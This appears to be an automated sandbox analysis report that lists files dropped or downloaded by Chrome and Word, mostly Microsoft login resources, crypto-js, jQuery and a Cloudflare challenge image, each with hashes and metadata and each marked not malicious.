                                                                            Preview:L..................F.@.. ...$+.,......2Z#R......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Yyt....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.t....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.t....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.t...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.t...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............N.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 19 13:36:12 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2683
                                                                            Entropy (8bit):4.002552327561466
                                                                            Encrypted:false
                                                                            SSDEEP:48:8tzdITh7eoJHkidAKZdA1duT6ehOuTbbiZUk5OjqehOuTbhy+yT+:8t6EoZTTTbxWOvTbhy7T
                                                                            MD5:FE622EDB99738CFBFDC6448134F8C7C2
                                                                            SHA1:553839FD50F1F96D100F2CF2195F426D51611CA0
                                                                            SHA-256:AF01AFFFA47B7ED5024F235FF36EB03CEFF6281FF70D416502E2D38E7AFDEF70
                                                                            SHA-512:9381997C8AD4D5377905F2DBB712880D34272C86057EB47DA07311D9B4CBDF8AAC024D6A8BC03EBEB9645368F2D5AAF4661FFCB17922F111163746D279F84AAE
                                                                            Malicious:false
                                                                            Preview:L..................F.@.. ...$+.,.....m.Z#R......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Yyt....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.t....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.t....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.t...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.t...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............N.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):162
                                                                            Entropy (8bit):3.6117468351948143
                                                                            Encrypted:false
                                                                            SSDEEP:3:1/+OOTEAPKbd/ffIWHW6nMCKxi8g/n:8O8FId/3h26nRKxzg/
                                                                            MD5:4848D216BCE7B2148F498259D5CDDC7E
                                                                            SHA1:9B27EB91A7164BD8CCA03E3CF0374EB23C1FDFCA
                                                                            SHA-256:9446A3B16BAEDE487F0243481CF0505FFC35C03AAB369F62714A98DFAB691E0F
                                                                            SHA-512:9D66B6DB9015AB4320A1D8757647573318BF8D0749877E1E37DF8BADE191CD6CEF88A754A964787A4D5D62667AEA992813CD55C21CBCD82E797BAAB2BA47BD53
                                                                            Malicious:false
                                                                            Preview:.......................................................... <a:satMod val="109000"/>. <a:tint val="8100#R......H..8....}.j.....T...=Rj
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):48316
                                                                            Entropy (8bit):5.6346993394709
                                                                            Encrypted:false
                                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                            Malicious:false
                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                            Category:downloaded
                                                                            Size (bytes):61052
                                                                            Entropy (8bit):7.996159932827634
                                                                            Encrypted:true
                                                                            SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                            MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                            SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                            SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                            SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                            Malicious:false
                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                                                                            Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 59 x 54, 8-bit/color RGB, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):61
                                                                            Entropy (8bit):4.068159130770306
                                                                            Encrypted:false
                                                                            SSDEEP:3:yionv//thPlKjYTfTAkxl/k4E08up:6v/lhPsMTMk7Tp
                                                                            MD5:2838F5B49CE181B22EB36E4BD0D31CFA
                                                                            SHA1:29D985BBF5A797E408BB553FE48483AA87FD9E8F
                                                                            SHA-256:32E440FFB9450B94CF72EAD13701C5FDC2CD16BC95503B9231AB10002AD995B9
                                                                            SHA-512:5CDBE3939E0A0AB9CF993970063193F83906E6A61270CEBDC591DAD9A578317952AB1A37F69073957B6D83EDD3603F530906A261F5AE4A9162B3FA574FD369AF
                                                                            Malicious:false
                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f481fd4183442af/1734618984617/Jf0Unnedg83rw87
                                                                            Preview:.PNG........IHDR...;...6.......v:....IDAT.....$.....IEND.B`.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):3452
                                                                            Entropy (8bit):5.117912766689607
                                                                            Encrypted:false
                                                                            SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                            MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                            SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                            SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                            SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                            Malicious:false
                                                                            URL:https://login.live.com/Me.htm?v=3
                                                                            Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                            Category:dropped
                                                                            Size (bytes):61052
                                                                            Entropy (8bit):7.996159932827634
                                                                            Encrypted:true
                                                                            SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                            MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                            SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                            SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                            SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                            Malicious:false
                                                                            Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                            Category:downloaded
                                                                            Size (bytes):1435
                                                                            Entropy (8bit):7.8613342322590265
                                                                            Encrypted:false
                                                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                            Malicious:false
                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 59 x 54, 8-bit/color RGB, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):61
                                                                            Entropy (8bit):4.068159130770306
                                                                            Encrypted:false
                                                                            SSDEEP:3:yionv//thPlKjYTfTAkxl/k4E08up:6v/lhPsMTMk7Tp
                                                                            MD5:2838F5B49CE181B22EB36E4BD0D31CFA
                                                                            SHA1:29D985BBF5A797E408BB553FE48483AA87FD9E8F
                                                                            SHA-256:32E440FFB9450B94CF72EAD13701C5FDC2CD16BC95503B9231AB10002AD995B9
                                                                            SHA-512:5CDBE3939E0A0AB9CF993970063193F83906E6A61270CEBDC591DAD9A578317952AB1A37F69073957B6D83EDD3603F530906A261F5AE4A9162B3FA574FD369AF
                                                                            Malicious:false
                                                                            Preview:.PNG........IHDR...;...6.......v:....IDAT.....$.....IEND.B`.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):48316
                                                                            Entropy (8bit):5.6346993394709
                                                                            Encrypted:false
                                                                            SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                            MD5:2CA03AD87885AB983541092B87ADB299
                                                                            SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                            SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                            SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                            Malicious:false
                                                                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                            Category:dropped
                                                                            Size (bytes):1435
                                                                            Entropy (8bit):7.8613342322590265
                                                                            Encrypted:false
                                                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                            Malicious:false
                                                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                            Category:downloaded
                                                                            Size (bytes):116343
                                                                            Entropy (8bit):7.997640489040715
                                                                            Encrypted:true
                                                                            SSDEEP:3072:s8ovOS/D3L+TGsLMet6+iNLTMMqfC4hyFv0As5:jNSrij/t6+aAMqfCoydM5
                                                                            MD5:3063B0DA40B45B46602FCE99AC53D315
                                                                            SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                                            SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                                            SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                                            Malicious:false
                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_27cef08ca792f8e8b149.js
                                                                            Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (65447)
                                                                            Category:dropped
                                                                            Size (bytes):81920
                                                                            Entropy (8bit):5.293062475393336
                                                                            Encrypted:false
                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mo:DIh8GgP3hujzwbhd3B
                                                                            MD5:B94669C6A4A12277D275E10502CF5276
                                                                            SHA1:6610E669BC3E3C7835D659CF9C006C976D4F65C9
                                                                            SHA-256:7F72A96A5323D2C37102A26E41631B501EB3B30EA20984604BA5E7A4EDFA571F
                                                                            SHA-512:80E78B8F7E878B626E692CF457B7AC78F7A424EC6EC08AF408621847FE18687F0464A846D0C2C90CFA36458BA5329277ABC7E4E211986B62591235DF1914EC4D
                                                                            Malicious:false
                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                            Category:dropped
                                                                            Size (bytes):49911
                                                                            Entropy (8bit):7.994516776763163
                                                                            Encrypted:true
                                                                            SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                            MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                            SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                            SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                            SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                            Malicious:false
                                                                            Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):3452
                                                                            Entropy (8bit):5.117912766689607
                                                                            Encrypted:false
                                                                            SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                            MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                            SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                            SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                            SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                            Malicious:false
                                                                            URL:https://login.live.com/Me.htm?v=3
